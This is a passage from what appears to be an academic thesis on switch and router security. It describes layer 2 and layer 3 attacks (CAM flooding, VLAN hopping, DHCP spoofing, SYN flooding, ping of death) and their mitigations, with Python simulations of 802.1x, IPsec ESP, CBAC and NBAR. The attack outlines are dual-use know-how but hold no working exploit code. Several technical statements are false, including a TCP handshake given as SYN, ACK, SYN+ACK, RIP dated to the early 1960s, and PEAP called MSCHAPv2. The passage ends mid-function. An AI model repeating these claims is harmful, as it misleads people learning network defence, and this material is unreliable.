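        sw.forward("02:00:00:00:%02x:%02x" % (i >> 8, i & 0xFF), 3, "ff:ff:ff:ff:ff:ff")
    egress = sw.forward(a, 1, b)  # does A's frame to B now reach port 3?
    return (3 in sw.err_disabled, 3 in egress)


if __name__ == "__main__":
    print("no limit:", flood_scenario())
    print("max 2 MACs/port:", flood_scenario(max_macs_per_port=2))
```

Without a limit, A's and B's entries are evicted by the fake ones and A's frame is flooded to the attacker's port; with a limit of two MACs per port the attacker's port is err-disabled after the third fake address and A to B stays unicast.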

4.11.2 Root Guard

Some medium and large businesses install multiple switches for redundancy. Among multiple switches, one becomes the root switch and all the others forward their data towards it. If a switch is not configured with root guard, an intruder can plug in his own switch and make it the root, and can thereby redirect the clients' data to a place of his choosing. See appendix D for the configuration.

4.11.3 BPDU Guard

In multi-switch environments, switches send BPDUs (Bridge Protocol Data Units) [53] to discover the root switch. Root switch selection is slow because every port participates in the BPDU exchange. To make the process more efficient, an administrator puts the switch ports connected to clients into portfast mode for fast convergence. In portfast mode a port moves straight to forwarding while other ports are still in listening mode receiving BPDUs. A port in forwarding mode still participates in the BPDU exchange, so if a switch is connected to it, it could take over the root role. This can be prevented with BPDU guard. See appendix E for the configuration.

4.11.4 Trunk Auto-negotiation

A trunk port on a switch is a port that can carry multiple VLANs, and it uses VTP (VLAN Trunking Protocol) to pass VLAN information between switches. VTP reduces administrative overhead by automatically sending VLAN updates between the switches. The VLAN configuration depends on a VLAN revision number: if a switch receives a revision number higher than its own, it automatically replaces its old configuration with the new one. VTP only works on trunk ports and, by default, all ports are in auto state, which means that if a switch is connected to a port, the port becomes a trunk, and if a client is connected, it converts itself to access mode. If an intruder attaches a switch to a port that is in auto mode, then the intruder can not only take over the root role but can also wipe out the VTP information and inject his own. See appendix F for the configuration.

4.11.5 VLAN Hopping

VLAN hopping occurs where a switch port is configured for Dynamic Trunking Protocol (DTP). An attacker uses two methods to perform VLAN hopping. The first is switch spoofing, described in the section above. The second is double tagging, in which the attacker puts two VLAN tags on a frame: the first tag is consumed by the switch to which the intruder is attached and the second tag causes the next switch to forward the frame to the victim. With this technique the intruder sends data from one VLAN while making it appear to come from another. VLAN hopping is very dangerous and could corrupt, delete or modify data on the end computer. Another effect of VLAN hopping is to spread trojans, worms, viruses and other malicious software across the network. To prevent VLAN hopping, disable auto negotiation and never use the default VLAN on any port.


4.11.6 Wireless Bridge

In wireless networks, if an administrator wants to install multiple access points at certain locations to improve signal quality, he can achieve this either by connecting the access points through cables or through bridging. Bridges eliminate the cable extension and use the wireless signal to connect to each other. While implementing a wireless bridge, the administrator should make sure that the device only bridges to authorized devices and should disable any option that allows it to bridge to all devices.

Figure 2 : Wireless Bridge

4.11.7 DHCP Spoofing

DHCP (Dynamic Host Configuration Protocol) is a protocol that reduces administrative overhead by assigning IP addresses to clients automatically. The organization installs a dedicated box, such as a Windows 2003 or 2008 server, for automatic assignment of IPs to clients. If the switch has not been configured properly to protect against DHCP spoofing, an intruder can plug in his own DHCP server and start assigning IPs to the clients from it. This lets the intruder perform man-in-the-middle attacks or trust exploitation, or cause a network outage. The switch feature that stops an intruder from performing this attack is called DHCP snooping. See appendix G for the configuration.


Figure 3: Root Guard / BPDU Guard / DHCP Snooping

4.12 Layer 3 Security Issues

The router is the first device to be attacked, from the external as well as from the internal network. This section explores these attacks and their mitigation.

4.12.1 TCP SYN Flooding

TCP (Transmission Control Protocol) is a connection-oriented protocol which uses a three-way handshake to create a session for data flow. First the initiator sends SYN, the other side responds with ACK and, finally, the initiator sends SYN+ACK to establish the TCP session. In TCP SYN flooding, an intruder never sends the final SYN+ACK and thus leaves a half-open TCP session. If too many half-open sessions accumulate, the router cannot accept new requests until the old ones are completed. Since the intruder's goal is to attack the network, he never closes the old half-open sessions, resulting in a network outage. Hping2 [46] is used to perform TCP flooding. See Appendix H for the configuration.

4.12.2 Ping of Death Attack

The maximum packet size a router can handle is 65535 bytes. When a packet is larger than 65535 bytes it is fragmented, and the victim is unable to reassemble it, so the system crashes. Certain scripts are available that perform ping of death [12]. Compile the script with a C compiler and launch the attack at the victim through the default gateway. Make sure that the router does not allow packets-too-big across the interface.


4.12.3 Packet Sniffing

If security is applied with loopholes, it is possible for an intruder to sniff the whole ongoing communication and steal sensitive data. A user sitting inside the network, or even on the external network, can gather data with little or no technical skill; tools such as [21] [26] require no expert knowledge for packet sniffing. To control packet sniffing on the network, it is recommended to encrypt all data. With encryption, an intruder can still capture the data but can never read or tamper with it.

4.12.4 RIP Attack

RIP (Routing Information Protocol) is a distance vector protocol developed in the early 1960s to distribute routing information between routers. RIP has two versions. Version 1 has a big security issue: it sends information in clear text and does not support authentication. Without authentication, it is possible for an intruder to feed a peer false best-hop information. RIP uses the best hop to reach the destination network, that is, the lowest number of routers between the source and destination networks. Since no authentication is supported, an intruder can peer his router with the victim and replace the real best-hop information with a fake one, redirecting the data to his desired destination. To mitigate this issue, use RIPv2. RIPv2 forces its peers to authenticate before routing information is exchanged, so an intruder without credentials can never authenticate.

4.12.5 IP Spoofing

Private IP addresses are not allowed to be routed across the Internet. Since organizations use private IP address schemes inside their networks, an intruder can spoof an IP packet from outside the network to enter the network. Make sure that private IP addresses are blocked from outside the network.

4.12.6 Brute Force Attack

In a brute force attack, an intruder tries every combination of characters to find the actual password. The router should be properly configured for login methods so that it can detect and defend against brute force attacks. See Appendix H for the configuration.

The table below summarizes the tools, the platforms on which they can be used, the type of attack and the corresponding defensive strategy.


5 Case Study 1: Implementing Layer 2 Security

It is a common question how an organization can protect itself from security attacks. According to a study, threats originating from inside the network are ten times more lethal than those from outside, i.e. the Internet.

How to plan for and consider layer 2 issues depends on how large a network we want to deploy. If a company wants 99% uptime, it needs to install redundant connections and devices so that, if one device or link fails, the other can continue smooth operation. For the demonstration of layer 2 security, a case study that achieves good security practice is presented in the diagram below.

Figure 4: Case Study related to Layer 2 securities

The above diagram has 3 layer 2 switches, connected together for redundancy. A wireless access point has also been installed to demonstrate the best practices available for this wireless device.

MAC address spoofing is common in internal networks. An administrator configures a switch to allow certain MAC addresses, thus automatically denying those MAC addresses not found in the switch MAC table. An administrator also binds static leases in the DHCP server, so that allowed MAC addresses get an IP while those not found are denied. Bypassing this security measure is a two-minute process. To mitigate such security threats, NAC (Network Admission Control) has been implemented, which takes network security one step further and allows or denies access based on the user's credentials; finally, a voice over IP network attack is considered (note: configuring a voice over IP network is not covered in this thesis).

5.1 Planning the network

Before the real implementation of the network begins, it is important to consider the following steps:

Lock down all the devices in a separate room, away from unauthorized access.

Isolate the cables and label them properly so that troubleshooting is easy.

Apply update patches to all PCs and workstations. Install the latest antivirus.

Limit CPU usage per port (Appendix K).

Enable RSTP (Rapid Spanning Tree Protocol) on all switches (Appendix I).

Manually configure trunk and access ports. Double check that no port is left in auto or desirable mode.

Enable portfast on all access ports.

Only switch-to-switch ports should be configured as trunks. All other ports should be access ports.

For management purposes, configure a VLAN other than the default (VLAN 1).

Enable DHCP snooping. Trunks and the real DHCP server port should be marked as trusted.

Enable root guard on all access ports.

Enable BPDU guard on all access ports.

Limit the maximum number of MAC addresses per port.

Place all the PCs in the access VLAN. All IP telephony services should be placed in the voice VLAN (Appendix J).

Most important: isolate the access point(s) from users' reach. Otherwise the access point could easily be reset to factory defaults.

Configure a strong password on the access point, at least 25 characters. Do not use any dictionary word (e.g. R!d3cu!0us is a bad choice). Use a password with no meaning, mixing numbers, lower-case and upper-case letters, punctuation and special characters.

The access point should be configured with its own 802.1x configuration. The switch port attached to the wireless access point cannot participate in 802.1x, so the access point should use its own implementation of 802.1x, but its DHCP server should be off and all users must get their IP addresses from the DHCP server attached to the switch.

5.2 CISCO IBNS (Identity Based Network Service) / NAC (Network Admission Control) / 802.1x

So far, the most common way of implementing layer 2 security is using VLANs. With VLANs, security is tied to the physical port, binding certain groups to a specific VLAN. 80 to 90 percent of small to medium size businesses still rely on securing access through MAC addresses, but in many cases these two methods are considered weak. It is difficult to bind one PC permanently to one specific VLAN through MAC addresses: a port can be changed or a MAC can be spoofed. To solve this problem, CISCO IBNS has a role to play. It offers layer 2 security on the basis of users rather than ports or MAC addresses.

A lot of confusion exists about 802.1x. Many people think of it as a new mechanism for connecting to wireless networks. 802.1x is EAP (Extensible Authentication Protocol) carried over a LAN (wired or wireless), commonly known as "EAPOL" (EAP over LAN). 802.1x was the first method that implemented EAP over a Local Area Network on both wired and wireless networks. The Cisco method of implementing 802.1x is called "IBNS", while the other method of implementing 802.1x is called "NAC".

EAP:

Provides more than just user-based authentication (usernames / passwords, certificates, thumb prints, retina scans etc.).

Allows the RAS server to get out of the process (routers and switches are not involved in authentication).

Rides on top of other protocols (PPP, RADIUS, TACACS+ etc.).

5.2.1 Players involved in 802.1x

There are mainly three devices involved in the 802.1x process.

Supplicant (client): the end user who will connect to the network. The client PC needs an 802.1x compliant network card; some older operating systems (Windows 98, Windows 2000) lack driver support for connecting to an 802.1x network.

Authentication server: the server that checks the user's credentials.

Authenticator: the switch or wireless access point that takes EAP packets from the supplicant and passes them to the authentication server.

Whenever a client wants to associate with the network, the switch port starts in the unauthorized state. As soon as the client connects, the authenticator, usually a switch or wireless access point, sends an EAPOL packet to the client asking "who are you". The client replies with an EAP frame saying "This is who I am". The switch simply forwards the request to the server and, when the server gets the request, it sends a challenge to the client to verify. The client responds to the challenge and, depending on whether it is accepted, the server responds to the switch with "accept" or "reject", and the switch puts the port into the authorized state accordingly.


Figure 5: 802.1x authentication process

5.2.2 Flavors of EAP

The packets flowing between the devices are EAP. EAP is nothing more than an empty shell: inside it is a type of authentication protocol that the client and server must agree upon. A switch only needs to follow EAP; no other authentication support is required. Below are the types of EAP authentication.

Cisco LEAP (Lightweight EAP): this was the first authentication protocol intended for EAP. It is proprietary and is not used nowadays because it is vulnerable to dictionary attacks [38].

EAP-FAST: due to the problems found in Cisco LEAP, Cisco followed industry standards with EAP-FAST. EAP-FAST was widely appreciated because it solved the flaws found in LEAP and uses cryptographic elements to protect the communication. For more about EAP-FAST read [55].

Cisco / Microsoft PEAP (Protected EAP): by the time LEAP was considered weak, EAP-FAST was still in its draft phase and Cisco was unable to deploy it fully. Thus Cisco and Microsoft worked together to develop their own protocol. Microsoft PEAP ships with Windows, so the client has nothing to configure, and it is referred to as MSCHAPv2. The difference between Cisco and Microsoft PEAP is that, with Cisco PEAP, a client has to install an extra driver to support this version, and it only supports one-time passwords for authentication [56].


5.2.3 Limitations

Before starting the configuration of 802.1x, it is important to note that 802.1x cannot be enabled on the following ports.

SPAN (Switch Port Analyzer) ports: an administrator converts a switch port to act like a hub for IPS/IDS implementation, so that all communication can be sniffed by the administrator for security purposes.

Trunk ports: trunk ports carry data from any VLAN and cannot be enabled for 802.1x.

Dynamic ports: ports on which the switch detects the end device and sets the port mode accordingly. All ports should be hard-coded to access mode while implementing 802.1x.

EtherChannel ports: ports used by an administrator for link aggregation. 802.1x will not work on EtherChannel ports.

Secure ports: ports on which port-security has been enabled. 802.1x cannot be enabled on such a port, so in this configuration disable port security, because 802.1x will not work if the port has port-security enabled.

5.3 Implementing 802.1x

So far, the whole discussion has been about NAC/IBNS/802.1x. It is important to note that 802.1x is only a mechanism to authenticate users; it permits or denies users based on their credentials. Install Internet Authentication Service (the AAA/RADIUS server). It specifies the users, individually or as groups, that are allowed to authenticate. See Microsoft documentation for more information [57]. Configuration of AAA is important to make sure that a valid policy and the clients have been configured properly. After the server has been configured, the next step is to configure the switch to allow clients to perform 802.1x authentication (Appendix H). The last step is configuring the client. Open the properties of the network adapter that is going to participate in 802.1x authentication, enable the 802.1x checkbox, enable 802.1x authentication and make sure that PEAP is selected.

5.4 Results of Implementing 802.1x

After implementing 802.1x on the LAN, a valid user whose credentials existed on the Windows 2003 server was tried along with an invalid user not created on the Windows box. In the figure above, the intruder is the one with no valid identity. Both users were tested, and the port attached to the intruder's PC went to unauthorized status. This means that the intruder's port is blocked and he is no longer capable of accessing the network.

An interesting point is what happens if a valid user plays the role of an intruder who wants to harm the system. In that case, if the user tries to perform CAM overflow, the port will still move to the unauthorized state. Here is how it happens: the switch initially accepted the user based on his original MAC address. When the user later tries to overflow the MAC table by sending false MAC addresses, the switch cannot match the fake addresses to the username, and hence the port is moved to the unauthorized state.

Packet sniffing was performed against an authorized user, and a man-in-the-middle attack was launched. 802.1x trusts that any valid user is a user and not an intruder, but the question is how much we can trust that. We can never fully trust it, so in order to create one more safeguard against a man-in-the-middle attack, the next demonstration explains how to avoid a man-in-the-middle attack in this scenario.
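The port state behaviour of sections 5.2.1 and 5.4 (unauthorized until the server accepts, authorized for the one MAC that authenticated, back to unauthorized when other MACs appear) as an added example that is not part of the thesis. The challenge/response is a plain HMAC-SHA256 stand-in for the EAP method, not MSCHAPv2, and the user dictionary stands in for the RADIUS server.

```python
"""802.1X authenticator port model (added example, not from the thesis).

The challenge/response is a plain HMAC-SHA256 stand-in for the EAP method (it
is not MSCHAPv2) and the user dictionary stands in for the RADIUS server. What
is modelled is the port state and the MAC binding described in 5.2.1 and 5.4.
"""
import hashlib
import hmac
import os
from enum import Enum


class PortState(Enum):
    UNAUTHORIZED = "unauthorized"
    AUTHORIZED = "authorized"


class AuthServer:
    """Stand-in for the RADIUS/AAA server that holds the credentials."""

    def __init__(self, users):
        self.users = users  # {username: password}, constructed sample store

    def challenge(self):
        return os.urandom(16)

    def verify(self, username, nonce, response):
        password = self.users.get(username)
        if password is None:               # unknown user: Access-Reject
            return False
        expected = hmac.new(password.encode(), nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


class Supplicant:
    def __init__(self, mac, username, password):
        self.mac, self.username, self.password = mac, username, password

    def respond(self, nonce):
        return hmac.new(self.password.encode(), nonce, hashlib.sha256).digest()


class AuthenticatorPort:
    """One switch port in single-host mode: authorized for exactly one MAC."""

    def __init__(self, server):
        self.server = server
        self.state = PortState.UNAUTHORIZED
        self.bound_mac = None

    def link_up(self, supplicant):
        """EAPOL exchange: identity, challenge, response, accept/reject."""
        self.state, self.bound_mac = PortState.UNAUTHORIZED, None
        identity = supplicant.username            # EAP-Response/Identity
        nonce = self.server.challenge()           # challenge relayed by the switch
        response = supplicant.respond(nonce)      # EAP-Response from the client
        if self.server.verify(identity, nonce, response):   # Access-Accept
            self.state, self.bound_mac = PortState.AUTHORIZED, supplicant.mac
        return self.state

    def frame_from(self, src_mac):
        """A frame from any MAC other than the bound one on an authorized
        single-host port is a violation: the port falls back to unauthorized."""
        if self.state is PortState.AUTHORIZED and src_mac != self.bound_mac:
            self.state, self.bound_mac = PortState.UNAUTHORIZED, None
        return self.state


def demo():
    """Replays the cases from section 5.4; returns the resulting port states."""
    server = AuthServer({"alice": "correct horse battery staple"})  # constructed
    valid = Supplicant("00:11:22:33:44:55", "alice", "correct horse battery staple")
    intruder = Supplicant("66:77:88:99:aa:bb", "mallory", "guess")

    p1 = AuthenticatorPort(server)
    valid_state = p1.link_up(valid).value
    own_frames = p1.frame_from(valid.mac).value       # own MAC keeps the port open

    p2 = AuthenticatorPort(server)
    intruder_state = p2.link_up(intruder).value

    p3 = AuthenticatorPort(server)
    p3.link_up(valid)
    flooded = p3.state.value
    for i in range(3):                                 # CAM overflow attempt
        flooded = p3.frame_from("02:de:ad:be:ef:%02x" % i).value
    return {"valid": valid_state, "own_frames": own_frames,
            "intruder": intruder_state, "valid_then_flood": flooded}


if __name__ == "__main__":
    print(demo())
```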

5.5 Securing data through VPN

The above implementation cannot provide protection against packet sniffing. Packet sniffing and session hijacking can be avoided by encrypting the data. This demonstration briefly explains how to build a VPN between a client and a server so that data is transmitted securely. There is no need to install an extra operating system or software to complete this task. For the scenario above, follow these steps to create the SSL VPN.

In network connections, click on create new connection.

Click next and select set up an advanced connection.

Select allow incoming connections and click next.

Since the connection is dialing through the LAN, click next.

Select allow virtual private network connections.

Select or create the users who will be allowed to create a VPN connection through this server.

Select the services that this server will offer.

Click finish.

Now the server is ready for VPN connections. A client must also be set up in order to connect to the VPN server. The following steps set up the VPN connection on the client side.

In network connections, click on create new connection.

Select connect to the network at my workplace and click next.

Select virtual private network connection.

Enter a user-friendly name for this connection and click next.

Enter the host name or IP address, in this case the IP address of the Windows 2003 server.

Select create a shortcut on the desktop and click finish.

Now both client and server have been set up to establish a virtual private network and transfer data securely. Since the VPN has been deployed on a Windows 2003 box, the encryption scheme follows MSCHAPv2 [43] and all packets are encrypted using PEAP MSCHAPv2. It is also possible to deploy a more robust and feature-rich solution like OpenVPN [13], which is simpler to use and reduces administrative overhead by providing the flexibility to control the whole server through a web GUI.


6 Case Study 2: Implementing Layer 3 Security

Before the discussion and implementation of layer 3 security begins, it is important to look at the CISCO strategy of defence in depth (DID) [8]. It is a model suggested by CISCO which provides the defence mechanism in layers. The next section briefly describes DID and its structure.

6.1 Cisco Strategy for network defence

Cisco suggests a defence in depth (DID) strategy that applies security in layers. DID is not something to be bought as a set of security devices; rather it is implemented by combining several devices that each contribute to security, layer by layer.

Many devices can contribute to a DID structure. In the figure below, each device provides its own security measures, up to certain limitations. For example, the Cisco ASA (Adaptive Security Appliance) is good as a VPN termination point, for deep packet inspection etc., but cannot check the contents of an encrypted packet. If an encrypted packet carries malicious content, DID goes beyond the ASA with NIPS (network intrusion prevention systems) that constantly inspect traffic. The NIPS will try to catch and block it and then report the incident to the administrators. The layered approach then moves another step, and the hosts also participate in the security work: a Cisco Security Agent is installed on each system, so anything malicious that has passed the NIPS and the ASA is then inspected by the HIPS.

Figure 6: Cisco Defense in Depth (DID)

It is always recommended that management data be separated from ordinary network traffic. In the figure above, OOB (Out of Band) management addresses this. OOB implementation is important because, if the network is somehow compromised, the network administrator still has his own path to reach the devices and check for possible network faults. Contrary to that approach, in-band management is where network and management data flow on the same line. OOB implementation is ideal for larger deployments, since dedicating separate paths is expensive; for medium to smaller business solutions it is fine to implement in-band management, since it keeps implementation expenses down.

6.2 Implementing Layer 3 Security

This case study explicitly deals with attacks, and their mitigation, that are performed from outside the network. These attacks are more difficult and more generic in nature, and for this reason an attacker requires more knowledge and careful analysis to make his work successful. Before the demonstration begins, the following diagram will help in understanding the security plan.

Figure 7: Layer 3 security scenario

In the scenario above, an intruder has been placed in the communication path between the Branch office and Headquarters so that he/she is able to sniff all the data passing between the two sites. The intruder can capture all packets but will not be able to read or modify them. The next sections focus heavily on the encryption mechanism, along with avoiding IP spoofing attacks, DoS and DDoS attacks and port redirection, and managing Internet access through an Easy VPN Server.

6.3 Building Site to Site Virtual Private Network (VPN)

A VPN is a way of building a private network over a public network. The traditional way of connecting two sites is either difficult or expensive; a VPN provides a way of building a private network tunnel over a public network. Furthermore, an IPsec VPN is an inexpensive way of utilizing VPN technology while also offering security. In this case study, the first step is to secure data between the branch office and headquarters. The communication is likely to be sniffed, and for a network admin it is a challenge to provide security.


Before setting up the lab and analysing the results before and after the VPN is set up, a brief review of IPsec is important. IPsec is a suite of protocols that provides data authentication, integrity and confidentiality across the network. When two sites want to transfer data, they are required to authenticate themselves before transmission begins. This authentication is done using either a pre-shared key or digital certificates. When authentication is successful, the sending party encrypts the data using the DES, 3DES or AES [44] encryption algorithm to maintain confidentiality and hashes the data using the MD5 or SHA-1 algorithm to protect it from tampering. In this way, the original payload, along with the port information and the original source and destination addresses, is encrypted and a new header is placed in front of the encrypted data.

From the Branch office, we telnet to the Head office. An intruder captures all the communication in between, and we analyse what the intruder has sniffed before encryption. For the sake of demonstration we have used telnet, which is not recommended, but for the lab environment it is fine for showing data in clear text. The following data was retrieved, as shown in the image below.

Figure 8: Sniffing data across the network using wireshark without security

In the figure above, the telnet data was sent across the network in clear text, and as a result the passwords can be seen in the image.

Now it is time to protect the data. IPsec has been implemented between the branch and head office, and the following results were obtained after sniffing the packets.


Figure 9: Sniffing data across the network using Wireshark with security.

Since the packets were sent encrypted, the packet sniffer was not able to retrieve the information. Looking at the figure above, no information about the telnet communication is present. At this stage, an intruder has no idea what type of data is going across the network.
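The following is an added example (Python, not the thesis authors' code and not Cisco's) that models what the sniffer in Figures 8 and 9 sees before and after the telnet session is carried inside ESP, plus the integrity check that rejects a packet modified in transit. It assumes RFC 4303 ESP framing with the 96-bit HMAC-SHA1 ICV of the esp-sha-hmac transform; because the Python standard library has no AES, the keystream is produced by HMAC-SHA256 in counter mode as a stand-in for the AES encryption the thesis uses, and the keys and the telnet dialogue are constructed.

```python
import hashlib
import hmac
import os
import struct

ICV_LEN = 12          # esp-sha-hmac: HMAC-SHA1 truncated to 96 bits
IV_LEN = 16
NEXT_HEADER_TCP = 6   # the protected payload is a TCP (telnet) segment
# Constructed telnet exchange, as the sniffer in Figure 8 captured it in clear text.
TELNET_CLEARTEXT = b"login: admin\r\nPassword: s3cret\r\n"


def _keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Stand-in for the AES keystream (assumption: the stdlib has no AES):
    counter mode over HMAC-SHA256. A (key, iv) pair must never be reused."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, iv + struct.pack(">I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def esp_encapsulate(enc_key: bytes, auth_key: bytes, spi: int, seq: int,
                    plaintext: bytes, iv: bytes = b"") -> bytes:
    """ESP packet: SPI | seq | IV | encrypted(payload + trailer) | ICV."""
    iv = iv or os.urandom(IV_LEN)
    # Trailer = padding bytes 1..n, pad length, next header; pad to 16-byte blocks.
    pad_len = (-(len(plaintext) + 2)) % 16
    trailer = bytes(range(1, pad_len + 1)) + bytes([pad_len, NEXT_HEADER_TCP])
    body = plaintext + trailer
    ciphertext = bytes(a ^ b for a, b in zip(body, _keystream(enc_key, iv, len(body))))
    authenticated = struct.pack(">II", spi, seq) + iv + ciphertext
    icv = hmac.new(auth_key, authenticated, hashlib.sha1).digest()[:ICV_LEN]
    return authenticated + icv


def esp_decapsulate(enc_key: bytes, auth_key: bytes, packet: bytes) -> tuple:
    """Check the ICV first so a tampered packet is rejected before decryption."""
    authenticated, icv = packet[:-ICV_LEN], packet[-ICV_LEN:]
    expected = hmac.new(auth_key, authenticated, hashlib.sha1).digest()[:ICV_LEN]
    if not hmac.compare_digest(icv, expected):
        raise ValueError("ESP ICV mismatch: packet was modified in transit")
    spi, seq = struct.unpack(">II", authenticated[:8])
    iv, ciphertext = authenticated[8:8 + IV_LEN], authenticated[8 + IV_LEN:]
    body = bytes(a ^ b for a, b in zip(ciphertext, _keystream(enc_key, iv, len(ciphertext))))
    pad_len = body[-2]
    return spi, seq, body[:len(body) - pad_len - 2]


def sniffer_view(packet: bytes, protected: bool) -> str:
    """What a passive observer learns: the whole dialogue in clear text, or,
    once IPsec is in place, nothing beyond the ESP header fields."""
    if not protected:
        return packet.decode("ascii", errors="replace")
    spi, seq = struct.unpack(">II", packet[:8])
    return f"ESP SPI=0x{spi:08x} seq={seq}, {len(packet) - 8} bytes unreadable"


def demo() -> dict:
    enc_key, auth_key = b"E" * 32, b"A" * 20          # constructed lab keys
    packet = esp_encapsulate(enc_key, auth_key, 0x1000, 1, TELNET_CLEARTEXT)
    return {
        "before": sniffer_view(TELNET_CLEARTEXT, protected=False),
        "after": sniffer_view(packet, protected=True),
        "password_in_clear": b"s3cret" in TELNET_CLEARTEXT,
        "password_in_esp": b"s3cret" in packet,
        "decrypted": esp_decapsulate(enc_key, auth_key, packet)[2],
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```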

6.4 Implementing Classical firewalls / CBACS

DoS and DDoS attacks are very specific in nature and, if successful, can cause an immediate network outage or exhaust the router's CPU cycles. One way an intruder can do this is to spoof a private address that the internal network would trust, or even to hijack the TCP sequence number and inject his own packets.

DoS and DDoS attacks should be taken seriously by the network administrator, who should implement proper countermeasures before they happen. How a CBAC/classical firewall helps in mitigating DoS and DDoS attacks is discussed below.

When a router is configured with CBAC, the administrator inspects the data initiated from the inside network towards the outside network. Only the return traffic of sessions that passed the inspection rule is allowed back in, and anything uninvited is blocked.

In this demonstration, users from the branch office will be able to telnet to the head office, but the head office will not be able to telnet back to the branch office. Normally, when two sites have connectivity, both should be able to ping each other, but after implementing CBAC only the traffic generated by the branch office can find its way back; in our case we did get the ping reply, as it was initiated from the branch site. The two sites still have connectivity, but the inspection rule will not allow the head office to reach the branch office. See Appendix B for the configuration.

6.4.1 Results

Looking at the figure below, the following results were obtained.


Figure 10: Results from CBAC configuration

Looking at the figures above, the branch office first tried to ping and then to telnet into the head office, and both were successful. In the figure below, the head office tried to ping and telnet into the branch office, and both attempts were unsuccessful.
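As an added illustration of the CBAC behaviour just described (Python, not the thesis authors' configuration or Cisco code), the following models the inspection rule on the inside interface and the deny-all access list on the outside interface from Appendix B as a session table, and replays the branch-to-HQ and HQ-to-branch attempts; the addresses, ports and idle timeout are constructed.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    proto: str            # "tcp", "udp" or "icmp"
    src: str
    dst: str
    sport: int = 0        # 0 for icmp
    dport: int = 0
    flags: str = ""       # constructed label, e.g. "SYN" or "echo-reply"


class CBACRouter:
    """Inside interface runs 'ip inspect CBAC in'; the outside interface carries
    'access-list 101 deny ip any any' plus the temporary holes CBAC opens."""

    def __init__(self, inspected=("tcp", "udp", "icmp"), idle_timeout=30.0):
        self.inspected = set(inspected)
        self.idle_timeout = idle_timeout
        self.sessions = {}    # (proto, src, sport, dst, dport) -> last-seen time

    def inside_in(self, pkt: Packet, now: float) -> str:
        """Traffic initiated from inside: record it so that its reply may return."""
        if pkt.proto in self.inspected:
            self.sessions[(pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport)] = now
        return "forward"

    def outside_in(self, pkt: Packet, now: float) -> str:
        """Traffic arriving from outside: only replies to recorded sessions pass."""
        self._expire(now)
        reverse = (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if reverse in self.sessions:
            if pkt.proto == "tcp" and ("FIN" in pkt.flags or "RST" in pkt.flags):
                del self.sessions[reverse]        # session closed by the far end
            else:
                self.sessions[reverse] = now
            return "forward"
        return "drop"                              # access-list 101 deny ip any any

    def _expire(self, now: float) -> None:
        self.sessions = {k: t for k, t in self.sessions.items()
                         if now - t < self.idle_timeout}


def demo() -> list:
    """Replays section 6.4: branch (inside) may reach HQ (outside), not vice versa."""
    router = CBACRouter()
    branch, hq = "192.168.1.10", "192.168.2.10"    # constructed addresses
    steps = [
        ("in",  Packet("tcp", branch, hq, 40001, 23, "SYN"), 0),        # branch telnets HQ
        ("out", Packet("tcp", hq, branch, 23, 40001, "SYN,ACK"), 1),    # reply allowed back
        ("out", Packet("tcp", hq, branch, 50000, 23, "SYN"), 2),        # HQ telnets branch
        ("in",  Packet("icmp", branch, hq, flags="echo-request"), 3),   # branch pings HQ
        ("out", Packet("icmp", hq, branch, flags="echo-reply"), 4),     # reply allowed back
        ("out", Packet("icmp", hq, "192.168.1.20", flags="echo-request"), 5),  # HQ pings
        ("out", Packet("tcp", hq, branch, 23, 40001, "ACK"), 60),       # idle too long
    ]
    return [router.inside_in(p, t) if side == "in" else router.outside_in(p, t)
            for side, p, t in steps]


if __name__ == "__main__":
    print(demo())   # ['forward', 'forward', 'drop', 'forward', 'forward', 'drop', 'drop']
```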

6.5 Implementing Network Based Access Recognition (NBAR)

NBAR was first introduced as a tool for Quality of Service (QoS), but it is now making its way into security as well. As discussed in chapter 3, it is now difficult to block or allow access on the basis of ports. Applications like Kazaa2, Napster, BitTorrent etc. use dynamic ports and are able to find open ports; Kazaa2 can even scan for active ports and tunnel its way through port 80. Many applications are reprogrammed to start with the highest port in the network and work down to the best possible port through which they can tunnel.

NBAR does not rely on ports; instead it looks inside the contents of each packet and allows or denies packets based on those contents. The P2P applications discussed above could tunnel their data through other ports, but with NBAR implemented their access is simply denied.

In the NBAR demonstration, we use a BitTorrent client to download certain P2P applications from the internet. The router has been configured to allow only ports 80 and 443 and to deny all other traffic. We downloaded a BitTorrent client and changed its port to 80 to tunnel its data through port 80. First, we want to check the functionality without NBAR and see how the tunnel actually works.

6.5.1 Results

The client port was changed to the standard HTTP port (80), and the client successfully tunnelled its traffic through that port.


Figure 11: Tunnel p2p traffic through port 80 before NBAR

It can be seen from the picture above that the client is still able to download the data even though only two ports are allowed for inside users. So it is clear that stopping the traffic by port is not a solution; packet inspection is necessary. The next step is to configure NBAR (Appendix L) and then check the results.

Figure 12: Tunnel p2p traffic through port 80 after NBAR.

Using the same file and the same tunnel port after implementing NBAR, the P2P traffic was stopped, because in the NBAR configuration all P2P traffic has been set to drop.
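The following added example (Python, not from the thesis) contrasts the port-only policy with content inspection of the kind NBAR performs: the classifier recognises the BitTorrent peer handshake (the byte 0x13 followed by "BitTorrent protocol") and an HTTP tracker announce by their payloads rather than by port. The flows are constructed, and the signatures are a simplification of NBAR's own protocol matching.

```python
BT_HANDSHAKE = b"\x13BitTorrent protocol"   # first 20 bytes of a peer handshake
ALLOWED_PORTS = {80, 443}                    # the lab router's port-only policy


def classify_payload(payload: bytes) -> str:
    """Port-independent classification from the first bytes of the payload."""
    if payload.startswith(BT_HANDSHAKE):
        return "bittorrent"
    if payload.startswith((b"GET ", b"POST ", b"HEAD ")):
        request_line = payload.split(b"\r\n", 1)[0]
        # Tracker announces are ordinary HTTP requests carrying these query keys.
        if b"info_hash=" in request_line and b"peer_id=" in request_line:
            return "bittorrent"
        return "http"
    if len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03 and payload[5] == 0x01:
        return "tls"                         # TLS handshake record holding a ClientHello
    return "unknown"


def port_only_policy(dport: int, payload: bytes) -> str:
    """What the router did before NBAR: look at the destination port only."""
    return "permit" if dport in ALLOWED_PORTS else "deny"


def nbar_policy(dport: int, payload: bytes, drop_classes=("bittorrent",)) -> str:
    """Port policy first, then content inspection drops the blocked classes."""
    if dport not in ALLOWED_PORTS:
        return "deny"
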